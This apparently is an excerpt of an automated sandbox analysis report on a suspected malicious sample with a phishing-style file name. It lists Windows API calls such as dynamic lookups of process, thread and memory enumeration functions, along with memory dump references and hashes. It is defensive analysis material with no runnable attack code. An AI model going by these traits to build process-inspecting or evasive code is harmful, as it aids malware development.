                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
                                                                                                                                                                                                                          • Instruction ID: 86618f5e5291e47f99156ca1a41058ff12f6aa9fbee49080096b6405d6bf4e10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5E0C2B5320301AFEB105F7E5D80B12BBDCEF48664FA444BAF749DB381D2A0E8108B64

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 02B2AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B2ADA3,?,?,02B2AE35,00000000,02B2AF11), ref: 02B2AB30
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B2AB48
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B2AB5A
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B2AB6C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B2AB7E
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B2AB90
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B2ABA2
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B2ABB4
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B2ABC6
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B2ABD8
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B2ABEA
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B2ABFC
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B2AC0E
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B2AC20
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B2AC32
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B2AC44
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B2AC56
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 667068680-597814768
                                                                                                                                                                                                                          • Opcode ID: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
                                                                                                                                                                                                                          • Instruction ID: 9850fc4cf9ed551eaefa7cc161c4787925d1fdafef42a73977c19078ce779546
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B3114F0A91360AFEF00EBB4D985A6977E8EB16781B401DE1F805CF219EA74E804DF11
                                                                                                                                                                                                                          Function 02B15908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15925
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B1593C
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 02B1596C
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B159D0
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A06
                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A19
                                                                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A2B
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A37
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000), ref: 02B15A6B
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C), ref: 02B15A77
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B15A99
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                                                                                                                                          • Opcode ID: c4cff8e046979f3f225ec367358ea433210ad60c419e9a9d5ed35ed01914e410
                                                                                                                                                                                                                          • Instruction ID: 905c21ffe8dacf7c1d34f93c8a29a4feee15821d9281af3665a937d068eacd2e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4cff8e046979f3f225ec367358ea433210ad60c419e9a9d5ed35ed01914e410
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A418171E10619AFDB20DAE8CC88ADEB3BDEF48340FC445E5A658E7245E774DA448F90
                                                                                                                                                                                                                          Function 02B15BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                          • API String ID: 1599918012-2375825460
                                                                                                                                                                                                                          • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                                                                                          • Instruction ID: 62d51a6d47bec3f5ff2a09b0e2781232562ec7bd0e096047ac09988cb12e3b6a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B318471E4026C6AEB35DAB89C85FDF77AD9B44380FC401E29648E6181DB749F848F90
                                                                                                                                                                                                                          Function 02B17FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B17FF5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DiskFreeSpace
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1705453755-0
                                                                                                                                                                                                                          • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                                                                                                          • Instruction ID: d1b01f7b7ecbb76af78f08fd2bddc1c0b1fe0ed451d2bfef95bd40ca9d615cc0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A311C0B5A00209AF9B04CF99C881DBFF7F9FFC8300B54C569A509E7254E6719A018B90
                                                                                                                                                                                                                          Function 02B1A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                          • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                                                                                          • Instruction ID: 2c0be3ec501732e34097e27960e5e910dff8cef024a2f81397b4d0f33d2c2540
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BE0D871B0021417D311A5589C80EF6736D9B58310F8042FABD15C7385EDE0AE848BE4
                                                                                                                                                                                                                          Function 02B1B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,02B3D106,00000000,02B3D11E), ref: 02B1B79A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Version
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                                                                          • Opcode ID: 1ca47c8ba3a81762b4421bee666ac1a0309ecbeb84c6d260fdcdcd5bc6f48df8
                                                                                                                                                                                                                          • Instruction ID: 912d13be15c01edde08139fe5364f143dfaa3b64daf79b64149dd6a9a1cbc3a1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ca47c8ba3a81762b4421bee666ac1a0309ecbeb84c6d260fdcdcd5bc6f48df8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4F09D74A44301DFD350DF28D441A1AB7E9FF48B94F808DAAEA9887380E734D8148B52
                                                                                                                                                                                                                          Function 02B1A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B1BE72,00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1A823
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                          • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                                                                                          • Instruction ID: d587ccab2ad496537fb049c2a83c85784c3b01e094b5767708e64874f5dbb2d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CD05EA670E2602AA210A15A2D84DBB5ADCCFC67A1F8040BAB988C6101D210DD07DAB1
                                                                                                                                                                                                                          Function 02B1920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 481472006-0
                                                                                                                                                                                                                          • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                                                                                          • Instruction ID: 52f9ffa0ec4a7821e472b7f731096f940d11e3a87547e6358cbbc9d5af24f82d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0A0124040582041854033180C0257431455921A20FC4878068F8402D0E91D01208093
                                                                                                                                                                                                                          Function 02B3E596 Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 379896293323490cab44bd705708037f6b70e4d15813b33b4a1e49e9f4173a34
                                                                                                                                                                                                                          • Instruction ID: a2f31a942fd55c1e613ba96036e2faff5583385f20bfae2476d077f9317e6f00
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 379896293323490cab44bd705708037f6b70e4d15813b33b4a1e49e9f4173a34
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3515B9284E7D18FC7638B7844B92D23FA0AE7722435E51DBC8D09F163E209990BDB51
                                                                                                                                                                                                                          Function 02B120C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                                                          • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                                                                                                          Function 02B1D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B1D29D
                                                                                                                                                                                                                            • Part of subcall function 02B1D268: GetProcAddress.KERNEL32(00000000), ref: 02B1D281
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                                                          • API String ID: 1646373207-1918263038
